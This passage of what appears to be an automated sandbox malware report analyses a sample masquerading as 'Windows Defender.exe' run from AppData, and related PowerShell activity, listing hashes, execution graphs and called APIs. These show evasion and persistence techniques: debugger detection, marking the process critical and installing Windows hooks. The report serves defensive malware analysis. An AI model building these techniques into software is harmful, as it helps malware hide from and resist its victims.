                                    MD5 hash:E9FF85404CBD9C9DF15E13D0E4B960B1
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:22
                                    Start time:08:04:01
                                    Start date:08/10/2024
                                    Path:C:\Users\user\AppData\Local\Windows Defender.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\AppData\Local\Windows Defender.exe"
                                    Imagebase:0x400000
                                    File size:87'552 bytes
                                    MD5 hash:E9FF85404CBD9C9DF15E13D0E4B960B1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:22.2%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:8.8%
                                      Total number of Nodes:34
                                      Total number of Limit Nodes:1
                                      execution_graph 5071 7ffd34699d98 5072 7ffd34699da1 SetWindowsHookExW 5071->5072 5074 7ffd34699e71 5072->5074 5111 7ffd3469764a 5112 7ffd34697a70 CheckRemoteDebuggerPresent 5111->5112 5114 7ffd34697b0f 5112->5114 5099 7ffd3469b26e 5100 7ffd3469b2ac 5099->5100 5102 7ffd3469b2d0 5099->5102 5101 7ffd34699818 RtlSetProcessIsCritical 5100->5101 5101->5102 5075 7ffd34697a51 5077 7ffd34697a6c CheckRemoteDebuggerPresent 5075->5077 5078 7ffd34697b0f 5077->5078 5079 7ffd3469a584 5080 7ffd3469a58d 5079->5080 5083 7ffd3469a62f 5080->5083 5087 7ffd34699818 5080->5087 5082 7ffd3469a67a 5091 7ffd34699838 5082->5091 5088 7ffd34699821 RtlSetProcessIsCritical 5087->5088 5090 7ffd34699932 5088->5090 5090->5082 5092 7ffd34699841 RtlSetProcessIsCritical 5091->5092 5094 7ffd34699932 5092->5094 5095 7ffd34699848 5094->5095 5097 7ffd34699851 RtlSetProcessIsCritical 5095->5097 5098 7ffd34699932 5097->5098 5098->5083 5103 7ffd3469a663 5104 7ffd3469a665 5103->5104 5105 7ffd34699818 RtlSetProcessIsCritical 5104->5105 5106 7ffd3469a67a 5105->5106 5107 7ffd34699838 RtlSetProcessIsCritical 5106->5107 5108 7ffd3469a68d 5107->5108 5109 7ffd34699848 RtlSetProcessIsCritical 5108->5109 5110 7ffd3469a6bb 5109->5110

                                      Executed Functions

                                      Function 00007FFD346916E9 Relevance: 2.0, Strings: 1, Instructions: 702COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3497993527.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: CAL_^
                                      • API String ID: 0-3140518731
                                      • Opcode ID: 08a96b00fed9e154557e3864769da71711cd0edffcaf3f583e5689b2b070f104
                                      • Instruction ID: c58aaf7c4636b85ad649099d356cddc351cffa32ec86fafe77812084ac49b729
                                      • Opcode Fuzzy Hash: 08a96b00fed9e154557e3864769da71711cd0edffcaf3f583e5689b2b070f104
                                      • Instruction Fuzzy Hash: 2322B471B18B194FEB98FB7884B97B977D2FF99300F54057AE04EC3292DE68A8418741
                                      Function 00007FFD3469764A Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 221 7ffd3469764a-7ffd34697b0d CheckRemoteDebuggerPresent 226 7ffd34697b15-7ffd34697b58 221->226 227 7ffd34697b0f 221->227 227->226
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3497993527.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID: CheckDebuggerPresentRemote
                                      • String ID:
                                      • API String ID: 3662101638-0
                                      • Opcode ID: a330f5df000297fe05b2fdc229c0ff1260210cb27d5aa253d2bde152bdf1d94d
                                      • Instruction ID: 79415827e06fb6b45a3f8604073da9a522128926a4fe82904dec7dd782bdc270
                                      • Opcode Fuzzy Hash: a330f5df000297fe05b2fdc229c0ff1260210cb27d5aa253d2bde152bdf1d94d
                                      • Instruction Fuzzy Hash: 1B31B23190862C8FDB58DF9CD8897FA7BE0EF69311F04426AD48AD7241DB74A8468B91
                                      Function 00007FFD34696096 Relevance: .5, Instructions: 477COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 338 7ffd34696096-7ffd346960a3 339 7ffd346960a5-7ffd346960ad 338->339 340 7ffd346960ae-7ffd346960da 338->340 339->340 341 7ffd346960dc-7ffd3469610f 340->341 342 7ffd34696110-7ffd34696177 340->342 341->342 346 7ffd34696179-7ffd34696182 342->346 347 7ffd346961e3 342->347 346->347 348 7ffd34696184-7ffd34696190 346->348 349 7ffd346961e5-7ffd3469620a 347->349 350 7ffd346961c9-7ffd346961e1 348->350 351 7ffd34696192-7ffd346961a4 348->351 356 7ffd34696276 349->356 357 7ffd3469620c-7ffd34696215 349->357 350->349 352 7ffd346961a6 351->352 353 7ffd346961a8-7ffd346961bb 351->353 352->353 353->353 355 7ffd346961bd-7ffd346961c5 353->355 355->350 358 7ffd34696278-7ffd34696320 356->358 357->356 359 7ffd34696217-7ffd34696223 357->359 370 7ffd3469638e 358->370 371 7ffd34696322-7ffd3469632c 358->371 360 7ffd34696225-7ffd34696237 359->360 361 7ffd3469625c-7ffd34696274 359->361 363 7ffd34696239 360->363 364 7ffd3469623b-7ffd3469624e 360->364 361->358 363->364 364->364 366 7ffd34696250-7ffd34696258 364->366 366->361 372 7ffd34696390-7ffd346963b9 370->372 371->370 373 7ffd3469632e-7ffd3469633b 371->373 380 7ffd346963bb-7ffd346963c6 372->380 381 7ffd34696423 372->381 374 7ffd3469633d-7ffd3469634f 373->374 375 7ffd34696374-7ffd3469638c 373->375 377 7ffd34696351 374->377 378 7ffd34696353-7ffd34696366 374->378 375->372 377->378 378->378 379 7ffd34696368-7ffd34696370 378->379 379->375 380->381 382 7ffd346963c8-7ffd346963d6 380->382 383 7ffd34696425-7ffd346964b6 381->383 384 7ffd346963d8-7ffd346963ea 382->384 385 7ffd3469640f-7ffd34696421 382->385 391 7ffd346964bc-7ffd346964cb 383->391 387 7ffd346963ec 384->387 388 7ffd346963ee-7ffd34696401 384->388 385->383 387->388 388->388 389 7ffd34696403-7ffd3469640b 388->389 389->385 392 7ffd346964cd 391->392 393 7ffd346964d3-7ffd34696538 call 7ffd34696554 391->393 392->393 400 7ffd3469653a 393->400 401 7ffd3469653f-7ffd34696553 393->401 400->401
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3497993527.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: df065bce2b1b31e94a4b70038744a769cbd981ff6b5b5161e4635cc153052b12
                                      • Instruction ID: 2c404c56c4e3438fb10891b25e239b66e751cada963914d352627e94ffa73900
                                      • Opcode Fuzzy Hash: df065bce2b1b31e94a4b70038744a769cbd981ff6b5b5161e4635cc153052b12
                                      • Instruction Fuzzy Hash: CCF18530608B8D8FEBA9DF28C8557E937E1FF55310F04426EE84DC72A5DB78A9458B81
                                      Function 00007FFD34696E42 Relevance: .5, Instructions: 463COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 530 7ffd34696e42-7ffd34696e4f 531 7ffd34696e5a-7ffd34696e8a 530->531 532 7ffd34696e51-7ffd34696e59 530->532 533 7ffd34696e8c-7ffd34696ebf 531->533 534 7ffd34696ec0-7ffd34696f27 531->534 532->531 533->534 538 7ffd34696f29-7ffd34696f32 534->538 539 7ffd34696f93 534->539 538->539 541 7ffd34696f34-7ffd34696f40 538->541 540 7ffd34696f95-7ffd34696fba 539->540 547 7ffd34697026 540->547 548 7ffd34696fbc-7ffd34696fc5 540->548 542 7ffd34696f79-7ffd34696f91 541->542 543 7ffd34696f42-7ffd34696f54 541->543 542->540 545 7ffd34696f56 543->545 546 7ffd34696f58-7ffd34696f6b 543->546 545->546 546->546 549 7ffd34696f6d-7ffd34696f75 546->549 551 7ffd34697028-7ffd3469704d 547->551 548->547 550 7ffd34696fc7-7ffd34696fd3 548->550 549->542 552 7ffd34696fd5-7ffd34696fe7 550->552 553 7ffd3469700c-7ffd34697024 550->553 558 7ffd346970bb 551->558 559 7ffd3469704f-7ffd34697059 551->559 554 7ffd34696fe9 552->554 555 7ffd34696feb-7ffd34696ffe 552->555 553->551 554->555 555->555 557 7ffd34697000-7ffd34697008 555->557 557->553 561 7ffd346970bd-7ffd346970eb 558->561 559->558 560 7ffd3469705b-7ffd34697068 559->560 562 7ffd3469706a-7ffd3469707c 560->562 563 7ffd346970a1-7ffd346970b9 560->563 568 7ffd3469715b 561->568 569 7ffd346970ed-7ffd346970f8 561->569 564 7ffd3469707e 562->564 565 7ffd34697080-7ffd34697093 562->565 563->561 564->565 565->565 567 7ffd34697095-7ffd3469709d 565->567 567->563 570 7ffd3469715d-7ffd34697235 568->570 569->568 571 7ffd346970fa-7ffd34697108 569->571 581 7ffd3469723b-7ffd3469724a 570->581 572 7ffd3469710a-7ffd3469711c 571->572 573 7ffd34697141-7ffd34697159 571->573 575 7ffd3469711e 572->575 576 7ffd34697120-7ffd34697133 572->576 573->570 575->576 576->576 578 7ffd34697135-7ffd3469713d 576->578 578->573 582 7ffd3469724c 581->582 583 7ffd34697252-7ffd346972b4 call 7ffd346972d0 581->583 582->583 590 7ffd346972b6 583->590 591 7ffd346972bb-7ffd346972cf 583->591 590->591
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3497993527.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 67e95fe4ff0cec3860af73acd530af0c276117c02a144ab334ecada680da474f
                                      • Instruction ID: bd0355f74df3e7cbbeffb97e45c481d08d96e7b5134745227ca411d1e0966896
                                      • Opcode Fuzzy Hash: 67e95fe4ff0cec3860af73acd530af0c276117c02a144ab334ecada680da474f
                                      • Instruction Fuzzy Hash: EDE1B630608A4E8FEBA8DF28C8657F977E1FF55311F04426EE84DC7291DE78A9458781
                                      Function 00007FFD34692361 Relevance: .4, Instructions: 387COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3497993527.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 920e1260fc3e90f9e067676263635b804ff548bcc989bbd18fcdf7be20363fc2
                                      • Instruction ID: e92c86c4dc17bdc193826f8dd8181ee52838b6c5231762ed4b41d9283241130c
                                      • Opcode Fuzzy Hash: 920e1260fc3e90f9e067676263635b804ff548bcc989bbd18fcdf7be20363fc2
                                      • Instruction Fuzzy Hash: A2C1B031B1CA194FEBD8EB6884B53B977D2FF9A300F44057AD14ED3292DE6CA8429741
                                      Function 00007FFD346920C1 Relevance: .2, Instructions: 206COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3497993527.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ffbdc660ebb52f62c9a2749cc818cc7fed05ca494b5905838eca31bc25def1f4
                                      • Instruction ID: 2f83b0f405d7669ed5620fd6df276c177c4af3d938958e5901b200c72c7a5c1c
                                      • Opcode Fuzzy Hash: ffbdc660ebb52f62c9a2749cc818cc7fed05ca494b5905838eca31bc25def1f4
                                      • Instruction Fuzzy Hash: F151F010B1E6C50FE796ABB858B52B57FD5DF87229B0808FFE0CAC61A3DD581816C342
                                      Function 00007FFD346997C8 Relevance: 1.8, APIs: 1, Instructions: 284COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 166 7ffd346997c8-7ffd346997dc 168 7ffd346997de-7ffd346997f2 166->168 169 7ffd34699812-7ffd3469a8d6 166->169 172 7ffd34699828-7ffd34699829 168->172 173 7ffd346997f4-7ffd34699805 168->173 180 7ffd3469a8d8 169->180 181 7ffd3469a8de-7ffd3469a8fa 169->181 180->181
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3497993527.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID: CriticalProcess
                                      • String ID:
                                      • API String ID: 2695349919-0
                                      • Opcode ID: 1e437b7980930569df346ba0fb70d4f28feead003b7c019907a0cdaf4c63140d
                                      • Instruction ID: c7f2680f1a000cc3866824f320f2f1a01d0a2e23c355363412033512fcc203ed
                                      • Opcode Fuzzy Hash: 1e437b7980930569df346ba0fb70d4f28feead003b7c019907a0cdaf4c63140d
                                      • Instruction Fuzzy Hash: 9A814B72A0DA888FEB19DF9898956F97BE0FF56310F04007FD089D7293DA74A849CB51
                                      Function 00007FFD34699D98 Relevance: 1.6, APIs: 1, Instructions: 142COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 182 7ffd34699d98-7ffd34699d9f 183 7ffd34699daa-7ffd34699dba 182->183 184 7ffd34699da1-7ffd34699da9 182->184 185 7ffd34699dbc-7ffd34699dec 183->185 186 7ffd34699df0-7ffd34699e1d 183->186 184->183 185->186 189 7ffd34699ea9-7ffd34699ead 186->189 190 7ffd34699e23-7ffd34699e30 186->190 191 7ffd34699e32-7ffd34699e6f SetWindowsHookExW 189->191 190->191 193 7ffd34699e77-7ffd34699ea8 191->193 194 7ffd34699e71 191->194 194->193
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3497993527.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID: HookWindows
                                      • String ID:
                                      • API String ID: 2559412058-0
                                      • Opcode ID: 182af3de067c48b85242978f4f1bcdf649d6760bbdf09b3633dc49e6bc93b5ad
                                      • Instruction ID: 23086411386b65569164d94e68d1ae7621be82baf9aaa4527067b8f5a2191053
                                      • Opcode Fuzzy Hash: 182af3de067c48b85242978f4f1bcdf649d6760bbdf09b3633dc49e6bc93b5ad
                                      • Instruction Fuzzy Hash: 39410931A0CA5D4FDB19DFAC98566F97BE1EF5A321F00027FD049C3292CA656816CBC1
                                      Function 00007FFD34699848 Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 197 7ffd34699848-7ffd34699862 200 7ffd34699898-7ffd346998a9 197->200 201 7ffd34699864-7ffd3469987a 197->201 203 7ffd346998b0-7ffd34699930 RtlSetProcessIsCritical 200->203 201->203 207 7ffd3469987c-7ffd34699891 201->207 208 7ffd34699938-7ffd3469996d 203->208 209 7ffd34699932 203->209 207->200 209->208
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3497993527.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID: CriticalProcess
                                      • String ID:
                                      • API String ID: 2695349919-0
                                      • Opcode ID: dea6036fc6d61d392022380cc7895298d70fe50f7b73b0d2920d5c2076c7c2b3
                                      • Instruction ID: 39e34935169c79fdf527f0d8cf02b1942a0e548a3112ffd4f534c86e788e5d7b
                                      • Opcode Fuzzy Hash: dea6036fc6d61d392022380cc7895298d70fe50f7b73b0d2920d5c2076c7c2b3
                                      • Instruction Fuzzy Hash: 6A41F531A0CA598FEB28DF9D98956F97BE0FF65311F04013ED08AD3282DB746846CB91
                                      Function 00007FFD34697A51 Relevance: 1.6, APIs: 1, Instructions: 127COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 212 7ffd34697a51-7ffd34697a6a 213 7ffd34697a6c-7ffd34697a9f 212->213 214 7ffd34697aa0-7ffd34697b0d CheckRemoteDebuggerPresent 212->214 213->214 217 7ffd34697b15-7ffd34697b58 214->217 218 7ffd34697b0f 214->218 218->217
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3497993527.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID: CheckDebuggerPresentRemote
                                      • String ID:
                                      • API String ID: 3662101638-0
                                      • Opcode ID: f86355f7cde9283136f9d4865d296fceb8df0d428c76b0f1c522543b7d2a18d5
                                      • Instruction ID: f70903c8eae0e79b502f7534f58fdf82f11af7ec5fb2ff0f7c631f7631ec2663
                                      • Opcode Fuzzy Hash: f86355f7cde9283136f9d4865d296fceb8df0d428c76b0f1c522543b7d2a18d5
                                      • Instruction Fuzzy Hash: C631233190875C8FCB58DF9CC88A7E97BE0FF65311F05426AD489D7282DB34A846CB91

                                      Non-executed Functions

                                      Function 00007FFD3469132B Relevance: 1.6, Strings: 1, Instructions: 341COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3497993527.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2L_I
                                      • API String ID: 0-818225981
                                      • Opcode ID: a3eba47fc5c879db8a9d0a87cd5923f98c9f63eadddd3a4df5bb22430c9023cc
                                      • Instruction ID: 00363af24102926006244dfdfa643763b01472529f9ea16ca2aad824528db02a
                                      • Opcode Fuzzy Hash: a3eba47fc5c879db8a9d0a87cd5923f98c9f63eadddd3a4df5bb22430c9023cc
                                      • Instruction Fuzzy Hash: 23B17157B0E7D21FE753AA6868B50E63F60DF5326575900F7C2D4CB0A3ED0D680A93A2

                                      Executed Functions

                                      Function 00007FFD347539D1 Relevance: 2.8, Strings: 1, Instructions: 1578COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2359008699.00007FFD34750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34750000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7ffd34750000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: J_H
                                      • API String ID: 0-326533465
                                      • Opcode ID: f8dcca65e0e36a92b37a07d28c18daa067ad833e98ff10e4e2b034eefd2ef0f6
                                      • Instruction ID: c7090912a72c0292b2322aaf0186e57e46ac38a70d8a45667e0652888da7363c
                                      • Opcode Fuzzy Hash: f8dcca65e0e36a92b37a07d28c18daa067ad833e98ff10e4e2b034eefd2ef0f6
                                      • Instruction Fuzzy Hash: 49A2F6B2A0DB894FE766972858A52A47BE1EF57210B0901FBD18DCB1E3DD1CBC079391
                                      Function 00007FFD3468644D Relevance: .7, Instructions: 725COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2358490284.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7ffd34680000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c85f119d7a091c0f837d2dd22001afe47a4da292f1941fd6dc2c4cb3b583be18
                                      • Instruction ID: e02682b074281160a07db8deb1309959fb205d9ac9898c5d3eae35a6c3a11a74
                                      • Opcode Fuzzy Hash: c85f119d7a091c0f837d2dd22001afe47a4da292f1941fd6dc2c4cb3b583be18
                                      • Instruction Fuzzy Hash: F6D15E30A08A5E8FDF94DF58C495AED7BE1FF69300F14416AD40DD72A6CA38E881CB81
                                      Function 00007FFD3468A9B8 Relevance: .3, Instructions: 261COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2358490284.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7ffd34680000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 968aad1950088eff279f204b47e921519c62ef8b2f6bfc027371067264929b03
                                      • Instruction ID: b6fbee7165a76713b1ab677b7b1c0926a2db712f43a85bbe80b19b2e633fa8d6
                                      • Opcode Fuzzy Hash: 968aad1950088eff279f204b47e921519c62ef8b2f6bfc027371067264929b03
                                      • Instruction Fuzzy Hash: BB81483160C7924FD34ADF2888A55F57BE1EF57324B1800BAD9C9CB1A3EA1AA807C751
                                      Function 00007FFD3468A0D3 Relevance: .2, Instructions: 249COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2358490284.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7ffd34680000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cf2df2182037b6bdda8e34eaa51e89b3ee97cf5e6e44ea21e093a7c7505b590b
                                      • Instruction ID: ddf5fa31dd6aaae157505d65db82433b6bec6f5a035e41b3dfb8add723485b57
                                      • Opcode Fuzzy Hash: cf2df2182037b6bdda8e34eaa51e89b3ee97cf5e6e44ea21e093a7c7505b590b
                                      • Instruction Fuzzy Hash: 27115E3650D7C44FC7479F289C650A43FB0EF67211B0A00E7D588CB0A3E6698808C7A2
                                      Function 00007FFD34689758 Relevance: .1, Instructions: 130COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2358490284.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7ffd34680000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 84f346cb3846d69379f95dee3ec3f457ab4849222dcd126b1d34aae179195d97
                                      • Instruction ID: 28d9e074ac6741301a7a5eb86996fb526779f6ce9a56feb0646fd72a8a1aa755
                                      • Opcode Fuzzy Hash: 84f346cb3846d69379f95dee3ec3f457ab4849222dcd126b1d34aae179195d97
                                      • Instruction Fuzzy Hash: E3310731A1CB488FDB5C9F5C984A6E97BE0FB99310F10412FE449D3252DA24B856CBC2
                                      Function 00007FFD3456E99F Relevance: .1, Instructions: 128COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2357965197.00007FFD3456D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3456D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7ffd3456d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5660757c35e2affc6c38c855169ba91f2fb35745a61b354e1f1b367d0110059e
                                      • Instruction ID: 8c11cf107c7ec8f675c55a79b4aed49f828a57d4454ea68bb85fee9f353a283c
                                      • Opcode Fuzzy Hash: 5660757c35e2affc6c38c855169ba91f2fb35745a61b354e1f1b367d0110059e
                                      • Instruction Fuzzy Hash: 1841287180EBC44FD7579B3898959523FF0EF53220B1502DFD088CB1A7D629AC4AC7A2
                                      Function 00007FFD3468A8CC Relevance: .1, Instructions: 114COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2358490284.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7ffd34680000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 04a2e5d12e7309ff1dba5dbbb5df1fcfdd38f1535b6448eb44dd350a215a68fe
                                      • Instruction ID: 9011449cc6c837fdf966c632f63d0548f9ff3ce703da9b5ad58df1cf85fb936c
                                      • Opcode Fuzzy Hash: 04a2e5d12e7309ff1dba5dbbb5df1fcfdd38f1535b6448eb44dd350a215a68fe
                                      • Instruction Fuzzy Hash: 0831E53190CB4C8FDB59DF9C9C496E97BE0EB66320F04416FD44DC7162D674A84ACB91
                                      Function 00007FFD347540BF Relevance: .1, Instructions: 98COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2359008699.00007FFD34750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34750000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7ffd34750000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ea97ae4da80194bc768e33c972562a845e641d98635a37f31670178caceac838
                                      • Instruction ID: 91f43924dbd5e71741a96bd0a638ea16476a4224faaa80dbb1f800342cf8cabb
                                      • Opcode Fuzzy Hash: ea97ae4da80194bc768e33c972562a845e641d98635a37f31670178caceac838
                                      • Instruction Fuzzy Hash: E021B6B3B0DA568FE7A5AB1944E127476D2EF66210B5900FAD24DCB192DD1CFC069381
                                      Function 00007FFD347543BC Relevance: .1, Instructions: 63COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2359008699.00007FFD34750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34750000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7ffd34750000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 61d4a7095677c859b106a962f1b95db21f8422a90ad79e3e25604e895ff66166
                                      • Instruction ID: db00649b7d5640ad5c5eb286a601a38a4e4f4230ed14b99d5f60883feb16a71c
                                      • Opcode Fuzzy Hash: 61d4a7095677c859b106a962f1b95db21f8422a90ad79e3e25604e895ff66166
                                      • Instruction Fuzzy Hash: 44112CB2F0E5498FE7A4DB1984E46B877D1EF4621474900FAD15DCB1A3D91CBC1293C1
                                      Function 00007FFD3475681E Relevance: .1, Instructions: 60COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2359008699.00007FFD34750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34750000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7ffd34750000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: eacc5d59bcd1f4314ec96776f93ed83a5859e75d342e10bc00b2a1535c23c596
                                      • Instruction ID: b200309a5081f98b6c52e4dd35fe4e36116ac1a186ebc5d0f21993f2a6adb5c4
                                      • Opcode Fuzzy Hash: eacc5d59bcd1f4314ec96776f93ed83a5859e75d342e10bc00b2a1535c23c596
                                      • Instruction Fuzzy Hash: 68112772F0D6888FE765DA9844E556877D1EF1A314B1840FEC14CCB193D928B806C391
                                      Function 00007FFD346833B5 Relevance: .0, Instructions: 49COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2358490284.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7ffd34680000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                      • Instruction ID: 99ccd9aa28ab21da87489c59e0d9d7a1036f9ae1a88a610e4ac9eb2b15120870
                                      • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                      • Instruction Fuzzy Hash: 2701677121CB0C4FD744EF0CE451AA5B7E0FB95364F10056DE58AC3651DA36E892CB45

                                      Non-executed Functions

